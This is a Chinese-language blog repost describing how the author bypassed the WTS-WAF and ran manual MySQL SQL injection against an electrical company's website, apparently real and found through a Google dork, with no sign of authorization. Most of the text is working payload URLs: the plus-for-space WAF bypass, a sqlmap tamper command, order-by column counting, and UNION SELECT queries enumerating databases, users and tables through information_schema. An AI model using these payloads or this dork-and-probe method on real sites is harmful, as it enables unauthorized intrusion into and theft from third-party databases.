溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
本篇文章為大家展示了如何進行繞過WTS-WAF的分析,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。
inurl:.php?id= intext:電器
找到了一個電器公司的網站,隨便測了測,發現有waf
這還不安排(找了點資料,貌似直接加號代替空格就可以,直接嘗試)
發現沒有waf攔截了
資料還說了
sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py
工具我嘗試了發現無法開始
就這樣子......
http://*/*.php?id=1+and+1=1 #回顯正常 http://*/*.php?id=1+and+1=2 #回顯錯誤 說明存在注入 http://*/*.php?id=1+order+by+15 #15回顯錯誤 http://*/*.php?id=1+order+by+14 #14回顯正常 說明有14個字段 http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 #-1讓它錯誤然后執行后面
它回顯了第2和第8
http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14 #查詢當前數據庫信息和當前用戶 一些常見的函數 version() #顯示數據庫當前版本 database() / schema() #顯示當前數據庫名 user() / system_user() / session_user() / current_user() / current_user() #顯示當前用戶名稱 charset(str) #返回字符串str的字符集 collation(str) #返回字符串str的字符排列方式
http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1
它不能group_concat,那我就一個一個查了! http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #從1開始取一個 http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1 #從2開始取一個
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1
總結:
1.工具跑不起就只能手注了
2.實踐了下mysql的手注
上述內容就是如何進行繞過WTS-WAF的分析,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
